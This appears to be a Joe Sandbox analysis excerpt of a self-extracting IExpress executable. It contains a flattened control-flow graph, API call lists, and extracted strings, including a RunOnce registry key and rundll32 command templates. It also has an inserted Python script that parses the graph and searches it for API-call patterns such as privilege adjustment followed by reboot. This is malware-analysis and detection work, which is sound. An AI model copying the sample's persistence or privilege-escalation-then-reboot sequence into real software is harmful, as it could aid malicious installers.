7ff681c26ad1 2661->2671 2665 7ff681c26a38 2662->2665 2666 7ff681c2327b 2663->2666 2830 7ff681c26710 2664->2830 2665->2658 2669 7ff681c26a40 2665->2669 2666->2338 2666->2342 2670 7ff681c24f2c 24 API calls 2669->2670 2670->2655 2671->2658 2673 7ff681c26d07 GetWindowsDirectoryA 2671->2673 2674 7ff681c26b25 GetDriveTypeA 2671->2674 2676 7ff681c26f14 38 API calls 2673->2676 2677 7ff681c26b42 GetFileAttributesA 2674->2677 2688 7ff681c26b3d 2674->2688 2676->2671 2677->2688 2678 7ff681c26710 53 API calls 2678->2671 2679 7ff681c26b81 GetDiskFreeSpaceA 2681 7ff681c26baf MulDiv 2679->2681 2679->2688 2680 7ff681c22490 25 API calls 2680->2688 2681->2688 2682 7ff681c26c2e GetWindowsDirectoryA 2682->2688 2683 7ff681c27e08 CharPrevA 2685 7ff681c26c56 GetFileAttributesA 2683->2685 2684 7ff681c26f14 38 API calls 2684->2688 2686 7ff681c26c6c CreateDirectoryA 2685->2686 2685->2688 2686->2688 2687 7ff681c26c99 SetFileAttributesA 2687->2688 2688->2658 2688->2673 2688->2674 2688->2677 2688->2679 2688->2680 2688->2682 2688->2683 2688->2684 2688->2687 2689 7ff681c26710 53 API calls 2688->2689 2689->2688 2691 7ff681c26f5b 2690->2691 2692 7ff681c26f63 GetCurrentDirectoryA SetCurrentDirectoryA 2690->2692 2697 7ff681c286f0 7 API calls 2691->2697 2693 7ff681c26fbb GetDiskFreeSpaceA 2692->2693 2694 7ff681c26f8e 2692->2694 2695 7ff681c271da memset 2693->2695 2696 7ff681c26ffc MulDiv 2693->2696 2698 7ff681c24f2c 24 API calls 2694->2698 2908 7ff681c27958 GetLastError 2695->2908 2696->2695 2699 7ff681c2702a GetVolumeInformationA 2696->2699 2700 7ff681c233a1 2697->2700 2701 7ff681c26fab 2698->2701 2704 7ff681c270c1 SetCurrentDirectoryA 2699->2704 2705 7ff681c27062 memset 2699->2705 2700->2338 2700->2350 2889 7ff681c27958 GetLastError 2701->2889 2703 7ff681c271f2 GetLastError FormatMessageA 2707 7ff681c27234 2703->2707 2713 7ff681c270e9 2704->2713 2890 7ff681c27958 GetLastError 2705->2890 2710 7ff681c24f2c 24 API calls 2707->2710 2709 7ff681c26fb0 2709->2691 2712 7ff681c2724f SetCurrentDirectoryA 
2710->2712 2711 7ff681c2707a GetLastError FormatMessageA 2711->2707 2712->2691 2714 7ff681c2712c 2713->2714 2716 7ff681c27150 2713->2716 2715 7ff681c24f2c 24 API calls 2714->2715 2715->2709 2716->2691 2891 7ff681c22520 2716->2891 2719 7ff681c25f9b FindResourceA LoadResource LockResource 2718->2719 2720 7ff681c251f8 7 API calls 2718->2720 2721 7ff681c25fec 2719->2721 2722 7ff681c261bf 2719->2722 2720->2719 2723 7ff681c26046 2721->2723 2724 7ff681c25ff8 GetDlgItem ShowWindow GetDlgItem ShowWindow 2721->2724 2722->2370 2909 7ff681c25e44 #20 2723->2909 2724->2723 2727 7ff681c26059 #20 2728 7ff681c2604f 2727->2728 2729 7ff681c260c1 #22 2727->2729 2730 7ff681c24f2c 24 API calls 2728->2730 2731 7ff681c26145 2729->2731 2732 7ff681c26105 #23 2729->2732 2733 7ff681c26143 2730->2733 2734 7ff681c26151 FreeResource 2731->2734 2735 7ff681c26165 2731->2735 2732->2728 2732->2731 2733->2731 2734->2735 2736 7ff681c2618f 2735->2736 2737 7ff681c26171 2735->2737 2736->2722 2739 7ff681c261a1 SendMessageA 2736->2739 2738 7ff681c24f2c 24 API calls 2737->2738 2738->2736 2739->2722 2741 7ff681c24208 2740->2741 2758 7ff681c2421f 2740->2758 2743 7ff681c251f8 7 API calls 2741->2743 2742 7ff681c24235 memset 2742->2758 2743->2758 2744 7ff681c2434a 2745 7ff681c24f2c 24 API calls 2744->2745 2746 7ff681c24369 2745->2746 2747 7ff681c245e9 2746->2747 2749 7ff681c286f0 7 API calls 2747->2749 2750 7ff681c245fa 2749->2750 2750->2363 2751 7ff681c243eb CompareStringA 2752 7ff681c246d3 2751->2752 2751->2758 2752->2747 2753 7ff681c246ed RegOpenKeyExA 2752->2753 2753->2747 2757 7ff681c24722 RegQueryValueExA 2753->2757 2754 7ff681c24694 2759 7ff681c24f2c 24 API calls 2754->2759 2756 7ff681c251f8 7 API calls 2756->2758 2761 7ff681c24817 RegCloseKey 2757->2761 2762 7ff681c24767 memset GetSystemDirectoryA 2757->2762 2758->2742 2758->2744 2758->2747 2758->2751 2758->2752 2758->2754 2758->2756 2763 7ff681c245a8 LocalFree 2758->2763 2764 7ff681c245da LocalFree 2758->2764 2768 7ff681c242ed CompareStringA 2758->2768 
2783 7ff681c2448a 2758->2783 2936 7ff681c215f4 2758->2936 2975 7ff681c21d10 memset memset RegCreateKeyExA 2758->2975 3002 7ff681c24838 2758->3002 2765 7ff681c246b3 LocalFree 2759->2765 2761->2747 2766 7ff681c24798 2762->2766 2767 7ff681c247ae 2762->2767 2763->2752 2763->2758 2764->2747 2765->2747 2770 7ff681c27e08 CharPrevA 2766->2770 2771 7ff681c210bc _vsnprintf 2767->2771 2768->2758 2770->2767 2772 7ff681c247d7 RegSetValueExA 2771->2772 2772->2761 2773 7ff681c2449b GetProcAddress 2775 7ff681c2461c 2773->2775 2773->2783 2774 7ff681c2466f 2776 7ff681c24f2c 24 API calls 2774->2776 2777 7ff681c24f2c 24 API calls 2775->2777 2779 7ff681c24692 2776->2779 2780 7ff681c2463f FreeLibrary 2777->2780 2781 7ff681c2464e LocalFree 2779->2781 2780->2781 3028 7ff681c27958 GetLastError 2781->3028 2783->2773 2783->2774 2784 7ff681c245ce FreeLibrary 2783->2784 2785 7ff681c24580 FreeLibrary 2783->2785 3018 7ff681c27c50 2783->3018 2784->2764 2785->2763 2787 7ff681c251f8 7 API calls 2786->2787 2788 7ff681c2407b LocalAlloc 2787->2788 2789 7ff681c240cd 2788->2789 2790 7ff681c2409d 2788->2790 2791 7ff681c251f8 7 API calls 2789->2791 2792 7ff681c24f2c 24 API calls 2790->2792 2793 7ff681c240df 2791->2793 2794 7ff681c240bb 2792->2794 2795 7ff681c24120 lstrcmpA 2793->2795 2796 7ff681c240e3 2793->2796 3066 7ff681c27958 GetLastError 2794->3066 2799 7ff681c24188 LocalFree 2795->2799 2800 7ff681c2413e 2795->2800 2798 7ff681c24f2c 24 API calls 2796->2798 2801 7ff681c24101 LocalFree 2798->2801 2803 7ff681c23261 2799->2803 2802 7ff681c27d28 28 API calls 2800->2802 2801->2803 2804 7ff681c2415e LocalFree 2802->2804 2803->2329 2803->2338 2804->2803 2805->2365 2807 7ff681c279e2 2806->2807 2808 7ff681c210bc _vsnprintf 2807->2808 2814 7ff681c27a1a FreeResource 2807->2814 2815 7ff681c27a65 FreeResource 2807->2815 2809 7ff681c27a41 FindResourceA 2808->2809 2810 7ff681c279b6 LoadResource LockResource 2809->2810 2811 7ff681c27a63 2809->2811 2810->2807 2810->2811 2812 7ff681c286f0 7 API calls 2811->2812 2813 
7ff681c27a90 2812->2813 2813->2353 2814->2807 2815->2811 2817 7ff681c251f8 7 API calls 2816->2817 2818 7ff681c24a6f LocalAlloc 2817->2818 2819 7ff681c24ab1 2818->2819 2820 7ff681c24a91 2818->2820 2822 7ff681c251f8 7 API calls 2819->2822 2821 7ff681c24f2c 24 API calls 2820->2821 2823 7ff681c24aaf 2821->2823 2824 7ff681c24ac3 2822->2824 2823->2338 2825 7ff681c24ac7 2824->2825 2826 7ff681c24add lstrcmpA 2824->2826 2828 7ff681c24f2c 24 API calls 2825->2828 2826->2825 2827 7ff681c24b16 LocalFree 2826->2827 2827->2823 2828->2827 2829->2626 2831 7ff681c26809 2830->2831 2832 7ff681c26742 2830->2832 2872 7ff681c26d9c 2831->2872 2861 7ff681c265a8 2832->2861 2836 7ff681c286f0 7 API calls 2840 7ff681c268d2 2836->2840 2838 7ff681c267f8 2846 7ff681c27e08 CharPrevA 2838->2846 2839 7ff681c267a3 GetSystemInfo 2849 7ff681c267bd 2839->2849 2840->2658 2855 7ff681c22490 GetWindowsDirectoryA 2840->2855 2841 7ff681c26856 CreateDirectoryA 2843 7ff681c2686b 2841->2843 2844 7ff681c26894 2841->2844 2842 7ff681c26875 2845 7ff681c26f14 38 API calls 2842->2845 2843->2842 2884 7ff681c27958 GetLastError 2844->2884 2847 7ff681c26882 2845->2847 2846->2831 2851 7ff681c26886 2847->2851 2853 7ff681c268aa RemoveDirectoryA 2847->2853 2849->2838 2850 7ff681c27e08 CharPrevA 2849->2850 2850->2838 2851->2836 2852 7ff681c26899 2852->2851 2853->2851 2854->2655 2856 7ff681c224ec 2855->2856 2857 7ff681c224ce 2855->2857 2859 7ff681c286f0 7 API calls 2856->2859 2858 7ff681c24f2c 24 API calls 2857->2858 2858->2856 2860 7ff681c22507 2859->2860 2860->2671 2860->2678 2863 7ff681c265df 2861->2863 2864 7ff681c27e08 CharPrevA 2863->2864 2868 7ff681c2666f GetTempFileNameA 2863->2868 2885 7ff681c210bc 2863->2885 2865 7ff681c26640 RemoveDirectoryA GetFileAttributesA 2864->2865 2865->2863 2866 7ff681c266df CreateDirectoryA 2865->2866 2867 7ff681c266b4 2866->2867 2866->2868 2870 7ff681c286f0 7 API calls 2867->2870 2868->2867 2869 7ff681c2668f DeleteFileA CreateDirectoryA 2868->2869 2869->2867 2871 7ff681c266c6 2870->2871 
2871->2838 2871->2839 2871->2851 2873 7ff681c26db7 2872->2873 2873->2873 2874 7ff681c26dc0 LocalAlloc 2873->2874 2875 7ff681c26de0 2874->2875 2878 7ff681c26e21 2874->2878 2876 7ff681c24f2c 24 API calls 2875->2876 2877 7ff681c26dfe 2876->2877 2882 7ff681c26852 2877->2882 2888 7ff681c27958 GetLastError 2877->2888 2879 7ff681c27e08 CharPrevA 2878->2879 2881 7ff681c26e7f CreateFileA LocalFree 2879->2881 2881->2877 2883 7ff681c26ecb CloseHandle GetFileAttributesA 2881->2883 2882->2841 2882->2842 2883->2877 2884->2852 2886 7ff681c210eb _vsnprintf 2885->2886 2887 7ff681c210dc 2885->2887 2886->2887 2887->2863 2888->2882 2889->2709 2890->2711 2892 7ff681c2258a 2891->2892 2893 7ff681c2254d 2891->2893 2894 7ff681c2258f 2892->2894 2895 7ff681c225d3 2892->2895 2896 7ff681c210bc _vsnprintf 2893->2896 2897 7ff681c210bc _vsnprintf 2894->2897 2900 7ff681c210bc _vsnprintf 2895->2900 2907 7ff681c22585 2895->2907 2898 7ff681c22565 2896->2898 2899 7ff681c225a7 2897->2899 2902 7ff681c24f2c 24 API calls 2898->2902 2904 7ff681c24f2c 24 API calls 2899->2904 2905 7ff681c225ef 2900->2905 2901 7ff681c286f0 7 API calls 2903 7ff681c22631 2901->2903 2902->2907 2903->2691 2904->2907 2906 7ff681c24f2c 24 API calls 2905->2906 2906->2907 2907->2901 2908->2703 2910 7ff681c25ed1 2909->2910 2920 7ff681c25f46 2909->2920 2921 7ff681c255c0 2910->2921 2912 7ff681c286f0 7 API calls 2914 7ff681c25f5c 2912->2914 2914->2727 2914->2728 2915 7ff681c25ef1 #21 2916 7ff681c25f0c 2915->2916 2915->2920 2916->2920 2933 7ff681c259b0 2916->2933 2919 7ff681c25f33 #23 2919->2920 2920->2912 2922 7ff681c255f3 2921->2922 2923 7ff681c2563d lstrcmpA 2922->2923 2924 7ff681c25610 2922->2924 2926 7ff681c25634 2923->2926 2927 7ff681c25694 2923->2927 2925 7ff681c24f2c 24 API calls 2924->2925 2925->2926 2926->2915 2926->2920 2927->2926 2928 7ff681c256e8 CreateFileA 2927->2928 2928->2926 2931 7ff681c2571e 2928->2931 2929 7ff681c257a1 CreateFileA 2929->2926 2930 7ff681c25789 CharNextA 2930->2931 2931->2926 2931->2929 2931->2930 2932 
7ff681c25772 CreateDirectoryA 2931->2932 2932->2930 2934 7ff681c259cf 2933->2934 2935 7ff681c259e4 CloseHandle 2933->2935 2934->2919 2934->2920 2935->2934 2937 7ff681c21649 2936->2937 3029 7ff681c21558 2937->3029 2940 7ff681c27e08 CharPrevA 2942 7ff681c216dc 2940->2942 2941 7ff681c27fb8 2 API calls 2943 7ff681c2177f 2941->2943 2942->2941 2944 7ff681c21788 CompareStringA 2943->2944 2945 7ff681c219d3 2943->2945 2944->2945 2947 7ff681c217bb GetFileAttributesA 2944->2947 2946 7ff681c27fb8 2 API calls 2945->2946 2948 7ff681c219e0 2946->2948 2949 7ff681c219ab 2947->2949 2950 7ff681c217d5 2947->2950 2951 7ff681c219e9 CompareStringA 2948->2951 2952 7ff681c21a83 LocalAlloc 2948->2952 2955 7ff681c24f2c 24 API calls 2949->2955 2950->2949 2953 7ff681c21558 2 API calls 2950->2953 2951->2952 2961 7ff681c21a18 2951->2961 2952->2949 2954 7ff681c21aa3 GetFileAttributesA 2952->2954 2956 7ff681c217f9 2953->2956 2959 7ff681c21ab9 2954->2959 2974 7ff681c218c5 2955->2974 2958 7ff681c21823 LocalAlloc 2956->2958 2962 7ff681c21558 2 API calls 2956->2962 2957 7ff681c21b82 2960 7ff681c286f0 7 API calls 2957->2960 2958->2949 2963 7ff681c21847 GetPrivateProfileIntA GetPrivateProfileStringA 2958->2963 2972 7ff681c21b0c 2959->2972 2964 7ff681c21b9e 2960->2964 2961->2961 2965 7ff681c21a39 LocalAlloc 2961->2965 2962->2958 2966 7ff681c21940 2963->2966 2963->2974 2964->2758 2965->2949 2970 7ff681c21a6a 2965->2970 2968 7ff681c21951 GetShortPathNameA 2966->2968 2969 7ff681c21973 2966->2969 2968->2969 2973 7ff681c210bc _vsnprintf 2969->2973 2971 7ff681c210bc _vsnprintf 2970->2971 2971->2974 3037 7ff681c22ae8 2972->3037 2973->2974 2974->2957 2976 7ff681c21db6 2975->2976 2977 7ff681c21fff 2975->2977 2979 7ff681c210bc _vsnprintf 2976->2979 2983 7ff681c21e0d 2976->2983 2978 7ff681c286f0 7 API calls 2977->2978 2980 7ff681c2200e 2978->2980 2981 7ff681c21dd6 RegQueryValueExA 2979->2981 2980->2758 2981->2976 2982 7ff681c21e2c GetSystemDirectoryA 2981->2982 2984 7ff681c27e08 CharPrevA 2982->2984 2983->2982 2985 
7ff681c21e0f RegCloseKey 2983->2985 2986 7ff681c21e50 LoadLibraryA 2984->2986 2985->2977 2987 7ff681c21f3b GetModuleFileNameA 2986->2987 2988 7ff681c21e6c GetProcAddress FreeLibrary 2986->2988 2989 7ff681c21f5e RegCloseKey 2987->2989 2993 7ff681c21ece 2987->2993 2988->2987 2990 7ff681c21ea4 GetSystemDirectoryA 2988->2990 2989->2977 2991 7ff681c21ebb 2990->2991 2990->2993 2992 7ff681c27e08 CharPrevA 2991->2992 2992->2993 2993->2993 2994 7ff681c21ef7 LocalAlloc 2993->2994 2995 7ff681c21f1b 2994->2995 2996 7ff681c21f74 2994->2996 2997 7ff681c24f2c 24 API calls 2995->2997 2998 7ff681c210bc _vsnprintf 2996->2998 2999 7ff681c21f39 2997->2999 3000 7ff681c21faa 2998->3000 2999->2989 3000->3000 3001 7ff681c21fb3 RegSetValueExA RegCloseKey LocalFree 3000->3001 3001->2977 3003 7ff681c24874 CreateProcessA 3002->3003 3004 7ff681c2486d 3002->3004 3005 7ff681c249bb 3003->3005 3006 7ff681c248ca WaitForSingleObject GetExitCodeProcess 3003->3006 3007 7ff681c286f0 7 API calls 3004->3007 3065 7ff681c27958 GetLastError 3005->3065 3008 7ff681c24901 3006->3008 3010 7ff681c24a37 3007->3010 3014 7ff681c223c0 19 API calls 3008->3014 3017 7ff681c24932 CloseHandle CloseHandle 3008->3017 3010->2758 3011 7ff681c249c0 GetLastError FormatMessageA 3012 7ff681c24f2c 24 API calls 3011->3012 3012->3004 3016 7ff681c24955 3014->3016 3015 7ff681c249b2 3015->3004 3016->3017 3017->3004 3017->3015 3019 7ff681c27c85 3018->3019 3020 7ff681c27e08 CharPrevA 3019->3020 3021 7ff681c27cc3 GetFileAttributesA 3020->3021 3022 7ff681c27cf6 LoadLibraryA 3021->3022 3023 7ff681c27cd9 3021->3023 3025 7ff681c27d09 3022->3025 3023->3022 3024 7ff681c27cdd LoadLibraryExA 3023->3024 3024->3025 3026 7ff681c286f0 7 API calls 3025->3026 3027 7ff681c27d19 3026->3027 3027->2783 3028->2746 3030 7ff681c21579 3029->3030 3032 7ff681c21591 3030->3032 3033 7ff681c215c1 3030->3033 3051 7ff681c27f48 3030->3051 3034 7ff681c27f48 2 API calls 3032->3034 3033->2940 3033->2942 3035 7ff681c2159f 3034->3035 3035->3033 3036 7ff681c27f48 2 API 
calls 3035->3036 3036->3035 3038 7ff681c22b1f 3037->3038 3039 7ff681c22d41 3037->3039 3038->3039 3040 7ff681c22b28 GetModuleFileNameA 3038->3040 3041 7ff681c286f0 7 API calls 3039->3041 3040->3039 3048 7ff681c22b50 3040->3048 3042 7ff681c22d54 3041->3042 3042->2957 3043 7ff681c22b54 IsDBCSLeadByte 3043->3048 3044 7ff681c22b79 CharNextA CharUpperA 3047 7ff681c22c6d CharUpperA 3044->3047 3044->3048 3045 7ff681c22d13 CharNextA 3046 7ff681c22d25 CharNextA 3045->3046 3046->3039 3046->3043 3047->3048 3048->3043 3048->3044 3048->3045 3048->3046 3050 7ff681c22bbe CharPrevA 3048->3050 3056 7ff681c27ea0 3048->3056 3050->3048 3052 7ff681c27f60 3051->3052 3053 7ff681c27f99 3052->3053 3054 7ff681c27f6a IsDBCSLeadByte 3052->3054 3055 7ff681c27f82 CharNextA 3052->3055 3053->3030 3054->3052 3054->3053 3055->3052 3057 7ff681c27eb8 3056->3057 3057->3057 3058 7ff681c27ec1 CharPrevA 3057->3058 3059 7ff681c27edd CharPrevA 3058->3059 3060 7ff681c27ed5 3059->3060 3061 7ff681c27ef4 3059->3061 3060->3059 3062 7ff681c27efe CharPrevA 3060->3062 3061->3062 3063 7ff681c27f27 3061->3063 3064 7ff681c27f15 CharNextA 3061->3064 3062->3063 3062->3064 3063->3048 3064->3063 3065->3011 3066->2803 3068 7ff681c22349 RegQueryInfoKeyA RegCloseKey 3067->3068 3069 7ff681c223ad 3067->3069 3068->3069 3069->2394 3071 7ff681c222db 3070->3071 3072 7ff681c22271 3070->3072 3073 7ff681c286f0 7 API calls 3071->3073 3074 7ff681c27e08 CharPrevA 3072->3074 3075 7ff681c222ed 3073->3075 3076 7ff681c22284 WritePrivateProfileStringA _lopen 3074->3076 3075->2394 3076->3071 3077 7ff681c222b7 _llseek _lclose 3076->3077 3077->3071 3298 7ff681c2351e 3299 7ff681c2361c 3298->3299 3300 7ff681c23532 3298->3300 3302 7ff681c23615 3299->3302 3303 7ff681c23625 SendDlgItemMessageA 3299->3303 3301 7ff681c2353f 3300->3301 3304 7ff681c23571 GetDesktopWindow 3300->3304 3301->3302 3305 7ff681c23560 EndDialog 3301->3305 3303->3302 3306 7ff681c24dc8 14 API calls 3304->3306 3305->3302 3307 7ff681c23588 6 API calls 3306->3307 3307->3302 3308 
7ff681c25a1e 3309 7ff681c25a28 3308->3309 3310 7ff681c25a7d SetFilePointer 3309->3310 3311 7ff681c25a3c 3309->3311 3310->3311 3312 7ff681c2831e 3314 7ff681c28332 3312->3314 3319 7ff681c28aa8 GetModuleHandleW 3314->3319 3315 7ff681c28399 __set_app_type 3316 7ff681c283d6 3315->3316 3317 7ff681c283ec 3316->3317 3318 7ff681c283df __setusermatherr 3316->3318 3318->3317 3320 7ff681c28abd 3319->3320 3320->3315 3321 7ff681c28a1e SetUnhandledExceptionFilter 3322 7ff681c2845e 3323 7ff681c28478 GetStartupInfoW 3322->3323 3324 7ff681c284ab 3323->3324 3325 7ff681c284bd 3324->3325 3327 7ff681c284da Sleep 3324->3327 3326 7ff681c284cd _amsg_exit 3325->3326 3330 7ff681c284e7 3325->3330 3326->3330 3327->3324 3328 7ff681c28569 _initterm 3332 7ff681c28586 _IsNonwritableInCurrentImage 3328->3332 3329 7ff681c2854a 3330->3328 3330->3329 3330->3332 3331 7ff681c2866f _ismbblead 3331->3332 3332->3329 3332->3331 3333 7ff681c285f4 3332->3333 3334 7ff681c22d70 292 API calls 3333->3334 3335 7ff681c2862f 3334->3335 3336 7ff681c28646 3335->3336 3337 7ff681c2863e exit 3335->3337 3336->3329 3338 7ff681c2864f _cexit 3336->3338 3337->3336 3338->3329 3339 7ff681c25820 3340 7ff681c25881 ReadFile 3339->3340 3341 7ff681c2584d 3339->3341 3340->3341
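The control-flow graph above is the report's graph exported as text: every basic block is written as "<node id> <hex address> [API names...]", a collapsed callee appears as "<n> API calls", and edges are "<a>-><b>". The script below is added here as an illustration and is not part of the Joe Sandbox report or of the sample: it parses that format and then walks the edges to find basic blocks from which a whole API sequence is reachable on one path (for example OpenProcessToken followed by AdjustTokenPrivileges and ExitWindowsEx). The embedded input is a constructed excerpt in the report's CFG format, assembled from block lines that appear in the report; the pattern names in PATTERNS are this example's own.

```python
import re
from collections import defaultdict
from dataclasses import dataclass, field

# Token shapes in the extracted CFG text.
EDGE_RE = re.compile(r"^(\d+)->(\d+)$")          # "2427->2428"
ADDR_RE = re.compile(r"^[0-9a-fA-F]{8,16}$")     # "7ff681c21bf4"


@dataclass
class Block:
    node_id: int
    address: int
    apis: list = field(default_factory=list)   # API names called in this block
    summarized_calls: int = 0                  # from "<n> API calls" summaries


def parse_cfg(text):
    """Parse the flattened CFG dump into {node_id: Block} and a list of edges."""
    tokens = text.split()
    blocks, edges, current = {}, [], None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE_RE.match(tok)
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
            i += 1
            continue
        # "<n> API calls": the sandbox collapsed a callee; keep only the count.
        if tok.isdigit() and tokens[i + 1:i + 3] == ["API", "calls"]:
            if current is not None:
                current.summarized_calls += int(tok)
            i += 3
            continue
        # "<id> <hex address>" starts a new basic block.
        if tok.isdigit() and i + 1 < len(tokens) and ADDR_RE.match(tokens[i + 1]):
            current = Block(int(tok), int(tokens[i + 1], 16))
            blocks[current.node_id] = current
            i += 2
            continue
        # Anything else is an API name (including ordinal imports such as "#20").
        if current is not None:
            current.apis.append(tok)
        i += 1
    return blocks, edges


def reachable(edges, start):
    """Node ids reachable from `start` along CFG edges, including `start`."""
    succ = defaultdict(set)
    for a, b in edges:
        succ[a].add(b)
    seen, stack = set(), [start]
    while stack:
        n = stack.pop()
        if n in seen:
            continue
        seen.add(n)
        stack.extend(succ[n])
    return seen


def api_inventory(blocks):
    """Every distinct API name in the graph, sorted."""
    return sorted({api for b in blocks.values() for api in b.apis})


def find_api_paths(blocks, edges, pattern):
    """Ids of blocks that call pattern[0] and from which every other API in
    `pattern` is reachable, i.e. the whole sequence can execute on one path."""
    hits = []
    for nid, block in blocks.items():
        if pattern[0] not in block.apis:
            continue
        downstream = {api for d in reachable(edges, nid) if d in blocks
                      for api in blocks[d].apis}
        if all(api in downstream for api in pattern[1:]):
            hits.append(nid)
    return sorted(hits)


# Pattern names are this example's own; the API sequences are the ones in the report.
PATTERNS = {
    "privilege-adjust-then-reboot": ["OpenProcessToken", "AdjustTokenPrivileges", "ExitWindowsEx"],
    "dynamic-api-resolution": ["LoadLibraryA", "GetProcAddress"],
    "child-process-and-wait": ["CreateProcessA", "WaitForSingleObject", "GetExitCodeProcess"],
}

# Constructed excerpt in the report's CFG text format, assembled from block
# lines that appear in the report; edges to ids outside the excerpt are kept.
SAMPLE_CFG = """
2279 7ff681c22ea0 2275->2279
2427 7ff681c21bf4 GetCurrentProcess OpenProcessToken 2279->2427
2428 7ff681c21c57 LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2427->2428
2431 7ff681c21c34 2427->2431
2429 7ff681c21cd4 ExitWindowsEx 2428->2429 2428->2431 2429->2431
2430 7ff681c24f2c 24 API calls 2430->2432 2431->2430
2345 7ff681c232ae LoadLibraryA
2346 7ff681c232c7 GetProcAddress 2345->2346
2347 7ff681c232fb FreeLibrary 2345->2347 2346->2347
2348 7ff681c232e2 DecryptFileA 2346->2348 2348->2347
3003 7ff681c24874 CreateProcessA 3002->3003
3006 7ff681c248ca WaitForSingleObject GetExitCodeProcess 3003->3006
"""


def scan(text=SAMPLE_CFG):
    """Parse `text` and return {pattern name: [block ids where the sequence is reachable]}."""
    blocks, edges = parse_cfg(text)
    return {name: find_api_paths(blocks, edges, seq) for name, seq in PATTERNS.items()}


if __name__ == "__main__":
    blocks, edges = parse_cfg(SAMPLE_CFG)
    print(f"{len(blocks)} blocks, {len(edges)} edges, {len(api_inventory(blocks))} distinct APIs")
    for name, hits in scan().items():
        for nid in hits:
            print(f"{name}: starts at block {nid} @ {blocks[nid].address:#x}")
```

Pasting the full graph text from the report into parse_cfg gives the complete API inventory in one call, and find_api_paths answers the question the flat text cannot: whether two APIs merely both occur in the binary, or whether one is actually reachable from the other along control flow. Reachability is per exported graph, so edges that cross into a collapsed "<n> API calls" callee are not followed; that is why the privilege pattern is checked within the function that contains it.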

Callgraph


Control-flow Graph

Memory Dump Source
• Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
• Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
Similarity
• API ID: Resource$Free$CompareFindLibraryLocalString$AddressLoadLockProcSizeofmemcpy_smemset
• String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$Software\Microsoft\Windows\CurrentVersion\RunOnce$USRQCMD$advpack.dll$gam$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup0
• API String ID: 2679723528-1510213498
• Opcode ID: effdab913d68b8f5cb6356f1f4624d08c697481126c570b33e8394dce573185e
• Instruction ID: 48d3e8d2570c31c1f3d675755cc63f32af99fe50b8c5dbc66d44749d42a8d5d9
• Opcode Fuzzy Hash: effdab913d68b8f5cb6356f1f4624d08c697481126c570b33e8394dce573185e
• Instruction Fuzzy Hash: EE027D71A08692C7EB609B25E8406BA7BB0FF8D744F64613DDA4E83AA4DF7CE545C700

Control-flow Graph

Memory Dump Source
• Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
• Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
Similarity
• API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery
• String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
• API String ID: 1522771004-3208851462
• Opcode ID: 2b53b3767e793faff65087a239a43c24df66161b19351fe183ebef1a3c7f0936
• Instruction ID: 4bdfba7d277e39c221b1259c3aa5a727a8bf723c2a9f60058d3292cf0f512b4b
• Opcode Fuzzy Hash: 2b53b3767e793faff65087a239a43c24df66161b19351fe183ebef1a3c7f0936
• Instruction Fuzzy Hash: A8814972A18A82C7EB508B21E8442B9BBB0FF8DB54F646139DA4E83754DF3CE505C740

Control-flow Graph

Memory Dump Source
• Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
• Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
Similarity
• API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
• String ID: .BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
• API String ID: 383838535-1095083631
• Opcode ID: 04e882688a3d6962a8916aaff69b712f8d647ab79ac1c3b0525099cd5c9803bb
• Instruction ID: fa03966b3264d001ae24abaec8d682c680403c19a968088d9d4dcaec9e7d38dc
• Opcode Fuzzy Hash: 04e882688a3d6962a8916aaff69b712f8d647ab79ac1c3b0525099cd5c9803bb
• Instruction Fuzzy Hash: 24F18C62B08782D6EB618F24E4402BA7BB1FF49B94FA46139DA4D83795DF3DE509C300

Control-flow Graph

Memory Dump Source
